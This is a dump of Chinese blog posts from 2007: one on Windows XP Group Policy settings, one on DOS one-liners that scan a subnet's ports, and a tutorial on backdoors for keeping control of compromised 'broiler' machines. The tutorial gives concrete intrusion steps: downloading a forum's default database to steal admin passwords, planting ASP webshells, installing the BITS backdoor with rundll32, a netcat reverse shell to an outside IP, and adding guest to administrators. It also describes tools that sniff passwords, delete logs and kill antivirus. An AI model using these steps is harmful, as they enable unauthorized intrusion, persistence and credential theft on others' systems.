<p>在Windows2000/XP中都集成了组策略的功能，通过组策略可以设置各种软件、计算机和用户策略在某种方面增强系统的<a href="http://www.nohack.cn/" target=_blank>安全</a>性。运行&#8220;开始&#8594;运行&#8221;命令，在&#8220;运行&#8221;对话框的&#8220;打开&#8221;栏中输入&#8220;gpedit.msc&#8221;，然后单击&#8220;确定&#8221;按钮即可启动WindowsXP组策略编辑器。 </p>
<p>在&#8220;本地计算机策略&#8221;中，逐级展开&#8220;用户配置&#8594;管理模板&#8594;任务栏和开始菜单&#8221;分支，在右侧窗口中提供了&#8220;任务栏&#8221;和&#8220;开始菜单&#8221;的有关策略。 </p>
<p>在禁用&#8220;开始&#8221;菜单命令的时候，在右侧窗口中，提供了删除&#8220;开始&#8221;菜单中的公用<a href="http://www.nohack.cn/code/" target=_blank>程序</a>组、&#8220;我的文档&#8221;图标、&#8220;文档&#8221;菜单、&#8220;网上邻居&#8221;图标等策略。清理&#8220;开始&#8221;菜单的时候只要将不需要的菜单项所对应的策略启用即可，比如以删除&#8220;我的文档&#8221;图标为例，具体操作步骤为： </p>
<p>1)在策略列表窗口中用鼠标双击&#8220;从开始菜单中删除我的文档图标&#8221;选项。 </p>
<p>2)在弹出窗口的&#8220;设置&#8221;标签中，选择&#8220;已启用&#8221;单选按钮，然后单击&#8220;确定&#8221;即可。 </p>
<p>第四招：桌面相关选项的禁用 </p>
<p>WindowsXP的桌面就像你的办公桌一样，有时需要进行整理和清洁。有了组策略编辑器之后，这项工作将变得易如反掌，只要在&#8220;本地计算机策略&#8221;中展开&#8220;用户配置&#8594;管理模板&#8594;桌面&#8221;分支，即可在右侧窗口中显示相应的策略选项。 </p>
<p>1)隐藏桌面的系统图标 </p>
<p>倘若隐藏桌面上的系统图标，传统的方法是通过采用修改注册表的方式来实现，这势必造成一定的风险性，采用组策略编辑器，即可方便快捷地达到此目的。 </p>
<p>若要隐藏桌面上的&#8220;网上邻居&#8221;和&#8220;InternetEXPlorer&#8221;图标，只要在右侧窗口中将&#8220;隐藏桌面上网上邻居图标&#8221;和&#8220;隐藏桌面上的 InternetEXPlorer图标&#8221;两个策略选项启用即可。如果隐藏桌面上的所有图标，只要将&#8220;隐藏和禁用桌面上的所有项目&#8221;启用即可。 </p>
<p>当启用了&#8220;删除桌面上的我的文档图标&#8221;和&#8220;删除桌面上的我的<a href="http://www.nohack.cn/" target=_blank>电脑</a>图标&#8221;两个选项以后，&#8220;我的<a href="http://www.nohack.cn/" target=_blank>电脑</a>&#8221;和&#8220;我的文档&#8221;图标将从你的<a href="http://www.nohack.cn/" target=_blank>电脑</a>桌面上消失了。如果在桌面上你不再喜欢&#8220;回收站&#8221;这个图标，那么也可以把它给删除，具体方法是将&#8220;从桌面删除回收站&#8221;策略项启用。 </p>
<p>2)禁止对桌面的某些更改 </p>
<p>如果你不希望别人随意改变计算机桌面的设置，请在右侧窗口中将&#8220;退出时不保存设置&#8221;这个策略选项启用。当你启用这个了设置以后，其他用户可以对桌面做某些更改，但有些更改，诸如图标和打开窗口的位置、任务栏的位置及大小在用户注销后都无法保存。 </p>
<p>第五招：禁止访问&#8220;控制面板&#8221; </p>
<p>如果你不希望其他用户访问计算机的控制面板，你只要运行组策略编辑器，并在左侧窗口中展开&#8220;本地计算机策略&#8594;用户配置&#8594;管理模板&#8594;控制面板&#8221;分支，然后将右侧窗口的&#8220;禁止访问控制面板&#8221;策略启用即可。 </p>
<p>此项设置可以防止控制面板<a href="http://www.nohack.cn/code/" target=_blank>程序</a>文件的启动，其结果是他人将无法启动控制面板或运行任何控制面板项目。另外，这个设置将从&#8220;开始&#8221;菜单中删除控制面板，同时这个设置还从Windows资源管理器中删除控制面板文件夹。 </p>
<p>提示：如果你想从上下文菜单的属性项目中选择一个&#8220;控制面板&#8221;项目，会出现一个消息，说明该设置防止这个操作。 </p>
<p>第六招：设置用户权限 </p>
<p>当多人共用一台计算机时，在WindowsXP中设置用户权限，可以按照以下步骤进行： </p>
<p>1)运行组策略编辑器<a href="http://www.nohack.cn/code/" target=_blank>程序</a>。 </p>
<p>2)在编辑器窗口的左侧窗口中逐级展开&#8220;计算机配置&#8594;Windows设置&#8594;<a href="http://www.nohack.cn/" target=_blank>安全</a>设置&#8594;本地策略&#8594;用户权限指派&#8221;分支。 </p>
<p>3)双击需要改变的用户权限，单击&#8220;添加用户或组&#8221;按钮，然后双击想指派给权限的用户账号，最后单击&#8220;确定&#8221;按钮退出。 </p>
<p>第七招：文件夹设置审核 </p>
<p>WindowsXP可以使用审核跟踪用于访问文件或其他对象的用户账户、登录尝试、系统关闭或重新启动以及类似的事件，而审核文件和NTFS分区下的文件夹可以保证文件和文件夹的<a href="http://www.nohack.cn/" target=_blank>安全</a>。为文件和文件夹设置审核的步骤如下： </p>
<p>1)在组策略窗口中，逐级展开右侧窗口中的&#8220;计算机配置&#8594;Windows设置&#8594;<a href="http://www.nohack.cn/" target=_blank>安全</a>设置&#8594;本地策略&#8221;分支，然后在该分支下选择&#8220;审核策略&#8221;选项。 </p>
<p>2)在右侧窗口中用鼠标双击&#8220;审核对象访问&#8221;选项。 </p>
<p>3)用鼠标右键单击想要审核的文件或文件夹，选择弹出菜单的&#8220;属性&#8221;命令，接着在弹出的窗口中选择&#8220;<a href="http://www.nohack.cn/" target=_blank>安全</a>&#8221;标签。 </p>
<p>4)单击&#8220;高级&#8221;按钮，然后选择&#8220;审核&#8221;标签。 </p>
<p>5)根据具体情况选择你的操作： </p>
<p>倘若对一个新组或用户设置审核，可以单击&#8220;添加&#8221;按钮，并且在&#8220;名称&#8221;框中键入新用户名，然后单击&#8220;确定&#8221;按钮打开&#8220;审核项目&#8221;对话框。 </p>
<p>要查看或更改原有的组或用户审核，可以选择用户名，然后单击&#8220;查看/编辑&#8221;按钮。 </p>
<p>要删除原有的组或用户审核，可以选择用户名，然后单击&#8220;删除&#8221;按钮即可。 </p>
<p>6)如有必要的话，在&#8220;审核项目&#8221;对话框中的&#8220;应用到&#8221;列表中选取你希望审核的地方。 </p>
<p>7)如果想禁止目录树中的文件和子文件夹继承这些审核项目，选择&#8220;仅对此容器内的对象和/或容器应用这些审核项&#8221;复选框。 </p>
<p>注意：必须是管理员组成员或在组策略中被授权有&#8220;管理审核和<a href="http://www.nohack.cn/" target=_blank>安全</a>日志&#8221;权限的用户可以审核文件或文件夹。在WindowsXP审核文件、文件夹之前，你必须启用组策略中&#8220;审核策略&#8221;的&#8220;审核对象访问&#8221;。否则，当你设置完文件、文件夹审核时会返回一个错误消息，并且文件、文件夹都没有被审核。 </p>
<p><br></p>
<img src ="http://www.cnitblog.com/yiye/aggbug/27320.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yiye/" target="_blank">yiye</a> 2007-05-20 14:08 <a href="http://www.cnitblog.com/yiye/archive/2007/05/20/27320.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>dos命令扫描网段的端口</title><link>http://www.cnitblog.com/yiye/archive/2007/05/20/27321.html</link><dc:creator>yiye</dc:creator><author>yiye</author><pubDate>Sun, 20 May 2007 06:08:00 GMT</pubDate><guid>http://www.cnitblog.com/yiye/archive/2007/05/20/27321.html</guid><wfw:comment>http://www.cnitblog.com/yiye/comments/27321.html</wfw:comment><comments>http://www.cnitblog.com/yiye/archive/2007/05/20/27321.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yiye/comments/commentRss/27321.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yiye/services/trackbacks/27321.html</trackback:ping><description><![CDATA[<font id=Zoom>
<p>不需要任何工具,dos命令扫描一个网段的全部端口! <br>　　在win2000下开一个dos窗口，然后执行 <br>for /l %a in (1,1,254) do start /min /low telnet 192.168.0.%a 3389 <br>这样192.168.0.x这个段的所有开放3389端口得主机都会暴露 <br>这条命令执行后 <br>会在任务栏开254个小窗口 <br>然后telnet链接失败的窗口会在大约5秒后自动退出 <br>剩下的窗口就是相对应开放端口的主机了 <br>看一下小窗口的标题可以得知主机的ip地址 <br>如果你觉得机器性能很好的话 可以把/low参数去了 </p>
<p>现在扫描一台主机的多个端口，如下 <br>for /l %a in (1,1,65535) do start /low /min telnet 192.168.0.1%a <br>这样就扫描192.168.0.1的1到65535端口 </p>
<p>现在扫描一个网段的所有端口 <br>for /l %a in (1,1,254) do for /l %b in (1,1,65535) do start /low/min telnet 192.168.0.%a %b <br>这样就会扫描192.168.0.x段的全部1到65535段口 </p>
<p>以上命令只能在win2000下使用，因为/l累加参数是win2000对for的扩展 ,当然winXP和win.NET都可以用，winME我没有试过，因为没有winME的机器</p>
</font>
<img src ="http://www.cnitblog.com/yiye/aggbug/27321.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yiye/" target="_blank">yiye</a> 2007-05-20 14:08 <a href="http://www.cnitblog.com/yiye/archive/2007/05/20/27321.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>让肉鸡难逃五指山---精品后门程序及思路分板</title><link>http://www.cnitblog.com/yiye/archive/2007/05/20/27319.html</link><dc:creator>yiye</dc:creator><author>yiye</author><pubDate>Sun, 20 May 2007 06:07:00 GMT</pubDate><guid>http://www.cnitblog.com/yiye/archive/2007/05/20/27319.html</guid><wfw:comment>http://www.cnitblog.com/yiye/comments/27319.html</wfw:comment><comments>http://www.cnitblog.com/yiye/archive/2007/05/20/27319.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yiye/comments/commentRss/27319.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yiye/services/trackbacks/27319.html</trackback:ping><description><![CDATA[<font id=Zoom><font id=font_word style="FONT-SIZE: 14px; FONT-FAMILY: 宋体,Verdana,Arial,Helvetica,sans-serif">什么是后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a><br>后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>又称特洛伊<a href="http://www.nohack.cn/" target=_blank>木马</a>，其用途在于潜伏在<a href="http://www.nohack.cn/" target=_blank>电脑</a>中，从事搜集信息或便于<a href="http://www.nohack.cn/" target=_blank>黑客</a>进入的动作。后<a href="http://www.nohack.cn/code/" target=_blank>程序</a>和<a href="http://www.nohack.cn/" target=_blank>电脑</a><a href="http://www.nohack.cn/" target=_blank>病毒</a>最大的差别，在于后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>不一定有自我复制的动作，也就是后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>不一定会&#8220;感染&#8221;其他<a href="http://www.nohack.cn/" target=_blank>电脑</a>。<br>后门是一种登录系统的方法，它不仅绕过系统已有的<a href="http://www.nohack.cn/" target=_blank>安全</a>设置，而且还能挫败系统上各种增强的<a href="http://www.nohack.cn/" target=_blank>安全</a>设置。<br>后门是一种登录系统的方法，它不仅绕过系统已有的<a href="http://www.nohack.cn/" target=_blank>安全</a>设置，而且还能挫败系统上各种增强的<a href="http://www.nohack.cn/" target=_blank>安全</a>设置。<br>后门包括从简单到奇特，有很多的类型。简单的后门可能只是建立一个新的账号，或者接管一个很少使用的账号；复杂的后门（包括<a href="http://www.nohack.cn/" target=_blank>木马</a>）可能会绕过系统的<a href="http://www.nohack.cn/" target=_blank>安全</a>认证而对系统有<a href="http://www.nohack.cn/" target=_blank>安全</a>存取权。例如一个login<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，你当输入特定的密码时，你就能以管理员的权限来存取系统。<br>后门能相互关联，而且这个<a href="http://www.nohack.cn/" target=_blank>技术</a>被许多<a href="http://www.nohack.cn/" target=_blank>黑客</a>所使用。例如，<a href="http://www.nohack.cn/" target=_blank>黑客</a>可能使用密码破解一个或多个账号密码，<a href="http://www.nohack.cn/" target=_blank>黑客</a>可能会建立一个或多个账号。一个<a href="http://www.nohack.cn/" target=_blank>黑客</a>可以存取这个系统，<a href="http://www.nohack.cn/" target=_blank>黑客</a>可能使用一些<a href="http://www.nohack.cn/" target=_blank>技术</a>或利用系统的某个<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>来提升权限。<a href="http://www.nohack.cn/" target=_blank>黑客</a>可能使用一些<a href="http://www.nohack.cn/" target=_blank>技术</a>或利用系统的某个<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>庭湖来提升权限。<a href="http://www.nohack.cn/" target=_blank>黑客</a>可能会对系统的配置文件进行小部分的修改，以降低系统的防卫性能。也可能会安装一个<a href="http://www.nohack.cn/" target=_blank>木马</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>，使系统打开一个<a href="http://www.nohack.cn/" target=_blank>安全</a><a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>，以利于<a href="http://www.nohack.cn/" target=_blank>黑客</a>完全掌握系统。<br>以上是在<a href="http://www.nohack.cn/" target=_blank>网络</a>上常见的对&#8220;后门&#8221;的解释，其实我们可以用很简单的一句话来概括它：后门就是留在计算机系统中，供某位特殊使用都通过某种特殊方式控制计算机系统的途径！——很显然，掌握好后门<a href="http://www.nohack.cn/" target=_blank>技术</a>是每个<a href="http://www.nohack.cn/" target=_blank>网络</a><a href="http://www.nohack.cn/" target=_blank>安全</a>爱好者不可或缺的一项基本技能！它能让你牢牢抓住肉鸡，让它永远飞不出你的五指山！<br>下文将以笔者从事<a href="http://www.nohack.cn/" target=_blank>网络</a><a href="http://www.nohack.cn/" target=_blank>安全</a>多年的工作经验为基础，给广大的<a href="http://www.nohack.cn/" target=_blank>网络</a>初级<a href="http://www.nohack.cn/" target=_blank>安全</a>爱好者讲解一些<a href="http://www.nohack.cn/" target=_blank>网络</a>上常用的后门的种类和使用方法以及技巧，希望大家能在最短的时间内学习到最好的<a href="http://www.nohack.cn/" target=_blank>技术</a>，提升自己的<a href="http://www.nohack.cn/" target=_blank>网络</a><a href="http://www.nohack.cn/" target=_blank>安全</a><a href="http://www.nohack.cn/" target=_blank>技术</a>水平！<br><br>后门的分类<br>后门可以按照很多方式来分类，标准不同自然分类就不同，为了便于大家理解，我们从<a href="http://www.nohack.cn/" target=_blank>技术</a>方面来考虑后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的分类方法：<br>1.网页后门<br>此类后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>一般都是服务器上正常的web服务来构造自己的连接方式，比如现在非常流行的<a href="http://www.nohack.cn/code/asp/" target=_blank>asp</a>、cgi<a href="http://www.nohack.cn/code/" target=_blank>脚本</a>后门等。<br>2。线程插入后门<br>利用系统自身的某个服务或者线程，将后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>插入到其中，具体原理原来《<a href="http://www.nohack.cn/" target=_blank>黑客</a>防线》曾具体讲解过，感兴趣的朋友可以查阅。这也是现在最流行的一个后门<a href="http://www.nohack.cn/" target=_blank>技术</a>。<br>3扩展后门<br>所谓的&#8220;扩展&#8221;，是指在功能上有大的提升，比普通的单一功能的后门有很强的使用性，这种后门本身就相当于一个小的<a href="http://www.nohack.cn/" target=_blank>安全</a>工具包，能实现非常多的常驻见<a href="http://www.nohack.cn/" target=_blank>安全</a>功能，适合新手使用————但是，功能越强，个人觉得反而脱郭后门&#8220;隐蔽&#8221;的初衷，具体看法就看各位使用都的喜好了。<br>4.c/s后门<br>和传统的<a href="http://www.nohack.cn/" target=_blank>木马</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>类似的控制方法，采用&#8220;客记端/服务端&#8221;的控制方式，通过某种特定的访问方式来启动后门进而控制服务器。<br><br>5.rootkit<br>这个需要单独说明，其实把它单独列一个类在这里是不太恰当的，但是，rootkit的出现大大改变了后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的思维角度和使用理念，可以说一个好的rootkit就是一个完全的系统杀手！后文我们讲涉及到这方面，想念一定不会让大家失望！<br>上面是按照<a href="http://www.nohack.cn/" target=_blank>技术</a>做的分类，除了这些方面，正向连接后门、反向连接后门等分类也是很常见的，其实如何分类是编程者考虑的事，广大的使用者就不用考虑那么多了，我们看重的，只是功能！<br>入侵法定————精品后门<br><br>上面的&#8220;废话&#8221;想念大家都看累了吧？好，下面我们来看看现在<a href="http://www.nohack.cn/" target=_blank>网络</a>中浒的后门究竟长什么模样想学习<a href="http://www.nohack.cn/" target=_blank>网络</a><a href="http://www.nohack.cn/" target=_blank>安全</a>并想提高的朋友看清楚了哦，这可是让你的肉鸡逃不出你的五指山的大好途径！ <br><br>1.网页后门<br>近段时间<a href="http://www.nohack.cn/" target=_blank>网络</a>上针对系统<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>的<a href="http://www.nohack.cn/" target=_blank>攻击</a>事件渐渐少了，因为大家在认识到<a href="http://www.nohack.cn/" target=_blank>网络</a><a href="http://www.nohack.cn/" target=_blank>安全</a>的重要性之后，最简单却又最有效的防护办法：升级，都被大家所认同，所以系统<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>在以后的岁月中存活的周期会越来越短，而从最近的趋势来看，肢本<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>已经渐渐取代了系统<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>的地位，非常多的人开始研究起却本<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>来，sql注入也开始成为各大<a href="http://www.nohack.cn/" target=_blank>安全</a>站点首要关注热点，而说到<a href="http://www.nohack.cn/code/" target=_blank>脚本</a>、网页后门当然就是不得不说的重头戏了，现在国内入侵的主流趋势是先利用某种<a href="http://www.nohack.cn/code/" target=_blank>脚本</a><a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>上传<a href="http://www.nohack.cn/code/" target=_blank>脚本</a>后门，然后浏览服务器内安装和<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，找到提升权限的突破口，进而拿到服务器的系统权限。<br>现在<a href="http://www.nohack.cn/code/asp/" target=_blank>asp</a>、CGI、PHP这三个<a href="http://www.nohack.cn/code/" target=_blank>脚本</a>大类在<a href="http://www.nohack.cn/" target=_blank>网络</a>上的普遍运用带来了<a href="http://www.nohack.cn/code/" target=_blank>脚本</a>后门在这三方面的发展，下面我们一一道来：<br>海阳顶端ASP<a href="http://www.nohack.cn/" target=_blank>木马</a><br>这是ASP<a href="http://www.nohack.cn/code/" target=_blank>脚本</a>方面流传非常广的一个<a href="http://www.nohack.cn/code/" target=_blank>脚本</a>后门了，在经过几次大的改革后，推出了&#8220;海阳顶端ASP<a href="http://www.nohack.cn/" target=_blank>木马</a>XP版&#8221;、&#8220;海阳顶端ASP<a href="http://www.nohack.cn/" target=_blank>木马</a>红粉佳人版&#8221;等功能强大、使用方便的后门，想念经常接解脚步本<a href="http://www.nohack.cn/" target=_blank>安全</a>的朋友对这些都不会陌生。<br>类型：网页<a href="http://www.nohack.cn/" target=_blank>木马</a><br>使用范围：支持ASP、WEB访问<br>隐蔽<a href="http://www.nohack.cn/code/" target=_blank>程序</a>：★★★★☆<br>使用难度：★☆☆☆☆<br>危害<a href="http://www.nohack.cn/code/" target=_blank>程序</a>：★★★☆☆<br>查杀难度：★★★☆☆<br>现在的服务器系统配置都相对<a href="http://www.nohack.cn/" target=_blank>安全</a>，公开的系统<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>存在的机会很少，于是<a href="http://www.nohack.cn/code/" target=_blank>脚本</a>方面的<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>就开始火起来。首先我们通过某种途径获得一个服务器的页面权限（比如利用<a href="http://www.nohack.cn/bbs/" target=_blank>论坛</a>上传达室类型未严格设置、SQL注入后获得ASP系统的上传权限、对已知物理路径的服务器上传特定<a href="http://www.nohack.cn/code/" target=_blank>程序</a>），然后我们可以通过简单的上传ASP<a href="http://www.nohack.cn/code/" target=_blank>程序</a>或者是直接复制海阳项端的代码，然后通过WEB访问这个<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，就能很方便地查阅服务器上的资料了，下面举个简单的便子（由于只是简单的介绍，下文便子不会太难或者太普遍，希望大家理解）。<br>运用举便<br>leadbbs2.77曾经风靡<a href="http://www.nohack.cn/" target=_blank>网络</a>，它是个很典型的ASP<a href="http://www.nohack.cn/bbs/" target=_blank>论坛</a>，屏蔽了很多可以SQL注入的寺方，但是很多傻瓜级别的<a href="http://www.nohack.cn/" target=_blank>网络</a>管理员总是喜欢默认安装，然后启用<a href="http://www.nohack.cn/bbs/" target=_blank>论坛</a>，我们只需要很简单地在IE中输入：WWW。***。COM/BBS/DATA/LEADBBS。MDB就能够直接下载该<a href="http://www.nohack.cn/bbs/" target=_blank>论坛</a>的<a href="http://www.nohack.cn/code/sql/" target=_blank>数据库</a>了，而且没有MD5加密哦！，我们直接找到管理员的账户和密码，然后登录<a href="http://www.nohack.cn/bbs/" target=_blank>论坛</a>，到管理界面将<a href="http://www.nohack.cn/bbs/" target=_blank>论坛</a>的&#8220;联系我们&#8221;、&#8220;帮助&#8221;等ASP文件替换成我们的海阳项端代码，然后执行GUEST权限的CMD命令，方便的上传/下载将定<a href="http://www.nohack.cn/code/" target=_blank>程序</a>、远程执行<a href="http://www.nohack.cn/code/" target=_blank>程序</a>等，这样一个隐藏的后门就建好了！取得服务器的SYSTEM权限就看大家自己的办法了。<br>一般来讲，海洋的功能是非常强大的，而且不容易被查杀（一个朋友采取的方式是：先利用某个<a href="http://www.nohack.cn/code/" target=_blank>脚本</a><a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>上传网页后门，再通过海洋上传另一个后门到隐蔽的路径，然后通过最后上传的后门来删除第一次上传的海洋，这样后门的存放路径就可以放得非常深了，普通管理员是很难发现的），如果管理员觉得自己可能中了这里边样的后门，可以利用<a href="http://www.nohack.cn/bbs/" target=_blank>论坛</a>备份来恢复自己的页面系统，再配合系统日志、<a href="http://www.nohack.cn/bbs/" target=_blank>论坛</a>日志等<a href="http://www.nohack.cn/code/" target=_blank>程序</a>检查系统，发现可疑ASP文件打开看看海洋是很好识别的，再删除就可以了。<br><a href="http://www.nohack.cn/code/" target=_blank>脚本</a>方面的后门还有CGI和PHP两面三刀大类，使用原理都差不多，这里就不再多介绍，在黑防<a href="http://www.nohack.cn/bbs/" target=_blank>论坛</a>也收录了这三种后门，大家可以下载后自己研究。<br><br>2.线程插入后门<br>首先我们来简单解释一下什么是典型的"线程插入"后门:这种后门在运行时没有进程,所有<a href="http://www.nohack.cn/" target=_blank>网络</a>操作均播入到其他应用<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的进程中完成。也就是说，即使受控制端安装的防火墙拥有&#8220;应用<a href="http://www.nohack.cn/code/" target=_blank>程序</a>访问权限&#8221;的功能，也不能对这样的后门进行有效的警告和拦截，也就使对方的防火墙形同虚设了！这种后门是现在非常主流的一种，很让防护的人头疼，因为对它的查杀比较困难，这种后门本身的功能比较强大，是&#8220;居中家旅行、入侵<a href="http://www.nohack.cn/" target=_blank>攻击</a>&#8221;的必备品哦！<br>这类的典范就是国内提倡<a href="http://www.nohack.cn/" target=_blank>网络</a>共享的小榕的BITS了，从它的推出以来，各类<a href="http://www.nohack.cn/" target=_blank>安全</a>工具下载园地里BITS就高居榜首，非常多的朋友使用它的过程中感到了方便。<br><br>BITS<br>类型：系统后门<br>使用范围：wind200/xp/2003<br>隐蔽<a href="http://www.nohack.cn/code/" target=_blank>程序</a>：★★★★☆<br>使用难度：★★★☆☆<br>危害<a href="http://www.nohack.cn/code/" target=_blank>程序</a>：★★★★☆<br>查杀难度：★★★★☆<br><br>BITS 其实是BackgroundIntelligentTransferServicer的缩写，可以在不知不觉中实现另一种意义的典型的线程插入后门，有以下特点：进程管理器中看不到；平时没有端口，只是在系统中充当卧底的角色；提供正向连接和反向连接两种功能；仅适合用于<u><font color=#0000ff>windows</font></u>200/xp/2003。<br>运用举例<br>首先我们用3389登录上肉鸡，确定你有SYSTEM的权限，将BITS.DLL拷贝到服务器上，执行CMD命令：<br>rundll32.exebits.dll,install<br>这样就激活了BIST，<a href="http://www.nohack.cn/code/" target=_blank>程序</a>用这个特征的字符来辨认使用者，也就相当于你的密码了，然后卸载：rundll32.exeBITS.dll,Uninstall<br>这是最简单的使用，这个后门除了隐蔽性好外，还有两大特点是非常值得借鉴的：端口复用和正反向连接。虽然很多朋友经常听到这两个名词，但并不了解它们，端口复用就是利用系统正常的TCP端口通讯和控制，比如80、139等，这样的后门有个非常大的好处就是非常隐蔽，不用自己开端口也不会暴露自己的访问，因为通讯本身就是系统的正常访问！另一个是反向连接，这个很常见，也是后门中一个经典思路，因为从服务器上主动方问外边是不被禁止的，很多很历害的防火墙就怕这点！<br>BITS的正向连接很简单，大家可以参考它的README，这种方式在服务器没有防火墙等措施的时候很管用，可以方便地连接，但是遇到有防火墙这样的方式就不灵了，得使用下面的反向连接方式：<br>在本地使用NC监听（如：nc-l-p1234）<br>用NC连接目标主机的任何一个防火墙允许的TCP端口（80/139/445&#8230;&#8230;）<br>输入激活命令：hkfx@dancewithdolphin[rxell]:1.1.1.1:2222<br>目标主机的CMD将会出现NC监听的端口2222，这样就实现了绕过防火墙的功能了。<br>devil5(魔鬼5号）<br>类型：系统后门<br>使用范围：win200/xp/2003<br>隐蔽程度：★★★★☆<br>使用难度：★★☆☆☆<br>危害<a href="http://www.nohack.cn/code/" target=_blank>程序</a>：★★★★☆<br>查杀难度：★★★☆☆<br>同BITS一样，Devil5也是线程插入式的后门，和BITS不同的是它可以很方便的在GUI界面下按照自己的使用习惯定制端口和需要插入的线程，适合对系统有一定了解的使用都使用，由于是自定义插入线程，所以它更难被查杀，下面我们来看看它的使用。<br>运用举例：<br>道德使用它自带的配置<a href="http://www.nohack.cn/code/" target=_blank>程序</a>EDITDEVIL5.EXE对后门进行常规的配置,包括控制端口、插入线程、连接密码、时间间隔等方面关键点是对插入线程的定制，一般设置成系统自带的SVCHOST，然后运行后门就可以控制了。<br>我们用TELNET连接上去，连接的格式是：TELNET***定制的端口，它和其他后门不同之处在于连接后没有提示的界面，每次执行<a href="http://www.nohack.cn/code/" target=_blank>程序</a>也是分开的，必须要每次都有输入密码，比如我们丢掉了服务器和管账户，可以激活GUEST后再将GUEST加到管理员权限，记得每次执行命令后加上 &#8220;&gt;密码&#8221;就可以了：netlocalgroupadministratorsguest/add&gt;hkfx，然后你又可以控制服务器了。<br>很明显示，同榕哥的BITS相比，DEVIL5有一些缺陷：不能通过系统自带端口通讯、执行命令比较麻烦，需要每次输入密码而且不回显示输入内容，很容易出错。但是，它有自己的优势：插入线程可以自已定制，比如设置IE的线程为插入的目标就比较难被查杀：自己提供了专门的查杀工具 DELDEVIL5.exe，帮助防护者清理系统；而且它可以任意改名和绑定，使用灵活性上比BITS强&#8230;&#8230;大家选择哪能款就看自己的喜好了。<br>另外，PortLessBackDoor等工具也是此类的后门，功能强大，隐蔽性稍差，大家有兴趣可以自己研究一下。<br>3.扩展后门<br>所谓的扩展后门，在普通意义上理解，可以看成是将非常多的功能集成到了后门里，让后门本身就可以实现很多功能，方便直接控制肉鸡或者服务器，这类的后门非常受初学者的喜爱，通常集成了文件上传/下载、系统用户检测、HTTP访问、终端安装、端口开放、启动/停止服务等功能，本身就是个小的工具包，功能强大。<br>Wineggdroupshell<br>类型：系统后门<br>使用范围：win2000/xp/2003<br>隐蔽程度：★★★★☆<br>使用难度：★★☆☆☆<br>危害程度：★★★★☆<br>查杀难度：★★★★☆<br>这个后门是扩展后门中很有代表性的一个，功能这全面让人叹为观止，它能实现如下比较有特色的功能：进程管理，可查看，杀进程（支持用进程名或PID来杀进程）；注册表管现（查看，删除，增加等功能）；服务管理（停止，启动，枚举，配置，删除服务等功能）端口到<a href="http://www.nohack.cn/code/" target=_blank>程序</a>关联功能（fport）；系统重启，关电源，注销等功能（reboot,poweroff,shutdown,logoff）；嗅探密码功能；安装终端，修改终端端口功能；端口重定向功能（多线程，并且可限制连接者IP）；HTTP服务功能（多线程，并且可限制连接者IP）；Socd5代理功能（支持两种不同方式验证，可限制连接者IP）；克隆账号，检测克隆账户功能（clone,checkclone）；加强了的Findpassword功能（可以得到所有登录用户，包括使用克隆账户远程登录用户密码）；HTTP代理（完全匿名，支持oicq、msn、mirc等<a href="http://www.nohack.cn/code/" target=_blank>程序</a>）；其他辅助功能，http下载，删除日志，系统信息，恢复常用关联，枚举系统账户等。<br>当<a href="http://www.nohack.cn/" target=_blank>网络</a>上刚推出这个后门的时候，非常多的人用它来替换自己原来使用的后门，一时间各处赞扬之声迭起，但多为一些普通的打捞手的心声，其实它和&#8220;后门&#8221;的原始定义是有出入的：一旦你需要实现越多的功能，那你的<a href="http://www.nohack.cn/code/" target=_blank>程序</a>在执行、隐藏、稳定等方面就需要考虑非常多的问题，一个疏忽就会导致全盘皆败，所以不建议将此后门用在需要非常隐蔽的地方。<br>运用举例<br>在安装后门前，需要使用它自带的EditServer.exe<a href="http://www.nohack.cn/code/" target=_blank>程序</a>对服务端进行非常详细的配置，从10个具体配置中，包括了插入线程、密码、IP登录邮件通告等方面，不难看出它的功能是非常强大的，隐蔽性也很强，下面说几个在入侵中常用的功能，相信经常玩入侵的朋友一定能发现它的强大之处：<br>Fport:列出进程到端口的列表，用于发现系统中运行<a href="http://www.nohack.cn/code/" target=_blank>程序</a>所对应的端口，可以用来检测常见的隐蔽的后门。<br>Reboot:重启系统，如果你上传并运行了其他后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，并需要重启机器以便让后门正常工作，那使用这个命令吧！<br>Shell:得到一个DosShell,这个不多讲了，直接得到服务器或者肉鸡上的cmdshell。<br>PskillPID或<a href="http://www.nohack.cn/code/" target=_blank>程序</a>名：用于杀掉特定的服务，比如杀毒软件或者是防火墙。<br>Execute<a href="http://www.nohack.cn/code/" target=_blank>程序</a>：在后台中执行<a href="http://www.nohack.cn/code/" 